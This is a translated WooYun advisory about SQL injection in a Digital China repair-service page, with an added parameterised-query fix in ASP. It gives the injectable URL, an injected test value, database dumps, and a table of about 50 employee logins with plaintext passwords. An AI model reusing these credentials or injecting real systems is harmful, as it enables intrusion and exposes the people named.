Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0140093

Title: SQL injection in an important Digital China (神州数码) system (millions of accounts exposed / passwords stored in plaintext)

Vendor: digitalchina.com

Author: 深度安全实验室 (Deep Security Lab)

Submitted: 2015-09-10 09:45

Fixed: 2015-09-11 10:52

Published: 2015-09-11 10:52

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: fixed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2015-09-10: details sent to the vendor, awaiting vendor action
2015-09-10: vendor confirmed; details visible to the vendor only
2015-09-11: vendor fixed the vulnerability and chose to publish; details made public

Brief description:

See title.

Detailed description:

The Digital China repair service management system (维修服务管理系统) has SQL injection at the link below; the bill_id parameter is the injectable one.

http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191

(screenshot: 1.png)
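As an added illustration (not code from this report, and not Digital China's actual source), the following shows the classic-ASP pattern that typically produces this kind of finding next to a parameterised rewrite using ADODB.Command against Oracle. Only the parameter name bill_id, the Oracle back end and the BILL_INDEX table name come from the report; the STATUS column, the connection string, the expected bill-id format and all other names are assumptions for illustration.

```vbscript
<%
' Hypothetical reconstruction of snap_sdar.asp. bill_id, Oracle and BILL_INDEX
' come from the report; STATUS, the DSN, the credentials and the bill-id
' format below are assumed for illustration only.
Option Explicit
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Dim billId
billId = Request.QueryString("bill_id")

' --- Vulnerable pattern (the shape of code that yields this finding) ---
' The query string value is spliced straight into the SQL text, so a request
' such as bill_id=D506184191' AND 1=1-- becomes part of the statement.
' Dim sql
' sql = "SELECT BILL_ID, STATUS FROM BILL_INDEX WHERE BILL_ID = '" & billId & "'"
' Set rs = conn.Execute(sql)

' --- Defence in depth: reject input that cannot be a bill id before touching
' the database. The report's sample id is one upper-case letter followed by
' nine digits; treating that as the canonical format is an assumption.
Dim re
Set re = New RegExp
re.Pattern = "^[A-Z][0-9]{9}$"
If Not re.Test(billId) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid bill_id"
    Response.End
End If

' --- Fixed pattern: bind the value as a parameter. The driver sends it
' separately from the statement, so it can never be interpreted as SQL.
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=OraOLEDB.Oracle;Data Source=SMSDB;User Id=app_user;Password=********;"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' OraOLEDB takes positional "?" markers for ADO parameters
cmd.CommandText = "SELECT BILL_ID, STATUS FROM BILL_INDEX WHERE BILL_ID = ?"
cmd.Parameters.Append cmd.CreateParameter("p_bill_id", adVarChar, adParamInput, 20, billId)

Set rs = cmd.Execute
Do Until rs.EOF
    ' Encode on output as well; the column values are still untrusted data.
    Response.Write Server.HTMLEncode(rs("BILL_ID") & "") & " " & _
                   Server.HTMLEncode(rs("STATUS") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The parameter binding is the actual fix; the format check only narrows the attack surface and does not replace it. Note that the report also found the ERS.DIC_USERS table storing passwords in plaintext, which parameterising queries does nothing to address: any database read, whether via injection or a leaked backup, hands over working credentials, so those passwords need to be stored as salted, slow hashes regardless of how this particular injection is closed.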

Proof of vulnerability:

Found 11 databases.

(screenshot: 2.png)


Taking the U_DELL database as an example, it contains tables with tens of millions of rows.

back-end DBMS: Oracle
Database: U_DELL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| OPT_LIST | 22807944 |
| SER_RC_END | 9989419 |
| EDI_DETAIL | 5221963 |
| EDI_INVENTORY_TEMP_3S | 2814074 |
| REQ_LIST | 1770091 |
| SER_BACK_CLASS | 1703605 |
| REQ_INF | 1614940 |
| BILL_INDEX | 1606424 |
| T142_20_C | 1592256 |
| SER_INDEX | 1513885 |
| BILL_LIST_BAK | 1459097 |
| SER_INF_BAK | 1404593 |
| PART_LIST_BAK | 1293696 |
| RMA_PICK_UP_BAK | 1138502 |


Taking the ERS database as an example, it contains tables with millions of rows.

Database: ERS
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| LOGIN_LIST | 4141728 |
| CUST | 2718576 |
| PERSON_INF | 2392669 |
| CCS_DELL_RESULT | 1154633 |
| MAIL | 1056855 |
| CCS_CASE | 854095 |
| ORGNIZATION_PROFILE | 316973 |
| CCS_AD_BILL | 260222 |
| CCS_AD_OPT_LOG | 116561 |
| DAY_LIST | 10000 |


The exposed account information includes usernames, passwords and more. The passwords are actually stored in plaintext, which left me speechless.

Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID | PASSWORD | M1 | M2 | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140 | dc-fucx1 | zzzzzz1 | nec | dc-fucx1 | 2015-04-01 15:56:26 |
| 10141 | xa-songzy | song123 | nec | xa-songzy | 2009-10-09 09:38:18 |
| 10142 | bj-zhaoyan | 885669 | nec | bj-zhaoyan | 2001-01-01 00:00:00 |
| 10144 | dc-lyq | 1qa23z | nec | dc-lyq | 2012-03-12 11:48:43 |
| 10145 | sh-kl | 64661559kl | nec | sh-kl | 2011-09-07 18:27:12 |
| 10146 | bj2-yzy | yzy | nec | bj2-yzy | 2001-01-01 00:00:00 |
| 10147 | wh-lvyp | lyp811214 | nec | wh-lvyp | 2008-12-15 10:10:58 |
| 10148 | sy-huanghai | huanghai | nec | sy-huanghai | 2001-01-01 00:00:00 |
| 10149 | bj-libr | libr | nec | bj-libr | 2001-01-01 00:00:00 |
| 10150 | bj-liujd | 12345 | nec | bj-liujd | 2001-01-01 00:00:00 |
| 10151 | xa-liwq | 123456l | nec | xa-liwq | 2015-04-01 14:24:12 |
| 10152 | dc-syl | enter | nec | dc-syl | 2001-01-01 00:00:00 |
| 10153 | bj-lj | lijiae1 | nec | bj-lj | 2009-10-09 10:58:50 |
| 10154 | bj-fuqh | fuqh | nec | bj-fuqh | 2001-01-01 00:00:00 |
| 10155 | dc-zb | zhaobin7879 | nec | dc-zb | 2014-06-16 17:59:19 |
| 10156 | nj-zt | nj | nec | nj-zt | 2001-01-01 00:00:00 |
| 10157 | bj-fanyj | blfiqpgf | nec | bj-fanyj | 2001-01-01 00:00:00 |
| 10158 | bj-jl | akuma820809 | nec | bj-jl | 2001-01-01 00:00:00 |
| 10159 | bj2-jl | akuma820809 | nec | bj2-jl | 2001-01-01 00:00:00 |
| 10160 | bj2-mn | maning122802 | nec | bj2-mn | 2013-02-21 14:29:31 |
| 10161 | bj2-fyj | 198000 | nec | bj2-fyj | 2001-01-01 00:00:00 |
| 10162 | bj-xzm | xzm | nec | bj-xzm | 2001-01-01 00:00:00 |
| 10163 | sh-zxl | zxl321 | nec | sh-zxl | 2015-04-03 14:39:05 |
| 10164 | bj-zhy | zhy123 | nec | bj-zhy | 2013-07-08 09:16:43 |
| 10165 | dc-cc | dccc800 | nec | dc-cc | 2015-06-26 09:25:13 |
| 10166 | bj-lbw | 5211314 | nec | bj-lbw | 2001-01-01 00:00:00 |
| 10167 | sh-lx | anad0728 | nec | sh-lx | 2015-05-08 18:08:50 |
| 10168 | dc-sqj | 13301353150 | nec | dc-sqj | 2001-01-01 00:00:00 |
| 10170 | dc-wwj | 0606wwj | nec | dc-wwj | 2011-09-14 09:42:55 |
| 10171 | dc-wg | newpass123x | nec | dc-wg | 2013-09-23 15:13:00 |
| 10173 | bj-hxq | hxq000 | nec | bj-hxq | 2015-01-23 09:20:29 |
| 10175 | sh-zsy | tos901 | nec | sh-zsy | 2014-05-13 16:15:57 |
| 10176 | wh-lly | asd321 | nec | wh-lly | 2014-03-28 12:35:06 |
| 10177 | sz-tzy | NONE | nec | sz-tzy | 2001-01-01 00:00:00 |
| 10178 | bj-ty | ty19710401 | nec | bj-ty | 2008-12-31 15:16:16 |
| 10179 | bj-ln | 1234 | nec | bj-ln | 2001-01-01 00:00:00 |
| 10180 | bj-mn | 19810802 | nec | bj-mn | 2001-01-01 00:00:00 |
| 10181 | bj-wl | 741852pp | nec | bj-wl | 2013-07-04 18:44:50 |
| 10182 | bj-jxl | ooo | nec | bj-jxl | 2001-01-01 00:00:00 |
| 10183 | dc-nw | 781029 | nec | dc-nw | 2001-01-01 00:00:00 |
| 10184 | jn-zl | 123asd | nec | jn-zl | 2009-10-16 15:38:12 |
| 10185 | nj-zxy | zxy | nec | nj-zxy | 2012-07-05 14:19:53 |
| 10186 | dc-zhuhj | aaa111 | nec | dc-zhuhj | 2014-06-06 11:21:41 |
| 10187 | dc-niewei | 456 | nec | dc-niewei | 2001-01-01 00:00:00 |
| 10188 | nec-jzq | nec12345 | nec | nec-jzq | 2009-01-05 13:57:29 |
| 10189 | 10189 | lizhb2009 | nec | cd-zhouzh | 2010-09-21 18:17:24 |
| 10190 | nec-zq | nec111 | nec | nec-zq | 2009-03-12 17:55:26 |
| 10191 | nec-zgyj | 11111 | nec | nec-zgyj | 2001-01-01 00:00:00 |
| 10192 | nec-hy | 12345678 | nec | nec-hy | 2001-01-01 00:00:00 |
| 10193 | dc-yangqian | 42yangqian | nec | dc-yangqian | 2014-07-15 11:35:09 |
+---------+-------------+--------------+-----+-------------+----------------------+


Fix recommendation:

Copyright notice: when reproducing, credit the source as 深度安全实验室@乌云.


Vulnerability response

Vendor response:

Severity: High

Rank: 18

Confirmed: 2015-09-10 11:05

Vendor reply:

Will handle as soon as possible!

Latest status:

2015-09-11: fixed